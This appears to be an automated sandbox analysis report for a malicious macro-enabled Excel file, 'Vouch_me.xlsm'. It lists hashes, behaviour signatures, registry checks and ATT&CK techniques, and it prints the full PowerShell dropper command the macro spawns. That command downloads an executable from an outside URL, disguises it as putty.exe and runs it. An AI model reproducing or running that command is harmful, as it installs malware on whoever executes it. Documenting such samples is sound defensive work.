3d2f4071f4039fc8d0fa05ecc9cbad6f350e028dbae28f059d6f40446e688a16

General

Target

Vouch_me.xlsm
Size

48KB
MD5

7d50d1522e40087223060bc413bcf35d
SHA1

b1e708e5e73698623944736c81b86c6d58d230d4
SHA256

3d2f4071f4039fc8d0fa05ecc9cbad6f350e028dbae28f059d6f40446e688a16
SHA512

7cd7614be761191844f6506ee66d94cb4729ff3a7be33f96e2eba830fc1f079fa2897d5564f47349e227c233769acd6e5d30f43ffd4232207fd92e25905d7abe

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://seedwellresources.xyz/uT5wiEYASje8CME.exe

Signatures

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3420	powershell.exe
3420	powershell.exe
3420	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE
1732	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1732	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3420	1732	powershell.exe	67

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 3420	1732	EXCEL.EXE	72
PID 1732 wrote to memory of 3420	1732	EXCEL.EXE	72

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3420	powershell.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
18	3420	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Vouch_me.xlsm"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://seedwellresources.xyz/uT5wiEYASje8CME.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken
  - Blacklisted process makes network request
  PID:3420

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads